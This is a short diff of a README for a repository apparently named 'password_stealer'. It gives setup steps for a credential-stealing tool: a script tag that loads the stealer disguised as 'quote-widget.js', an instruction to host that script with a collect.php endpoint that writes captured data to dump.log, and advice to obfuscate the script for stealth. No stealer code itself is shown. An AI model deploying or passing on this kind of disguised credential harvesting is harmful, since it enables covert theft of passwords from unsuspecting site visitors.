cbaker730/password_stealer/README.md

     <script src="http://127.0.0.1/quote-widget.js"></script>

-Host the collect.php script and give it permission to write a dump.log file.
+Host the quote-widget.js script, collect.php file, and give collect.php permission to write a dump.log file.

 Obfuscate the script for more stealth.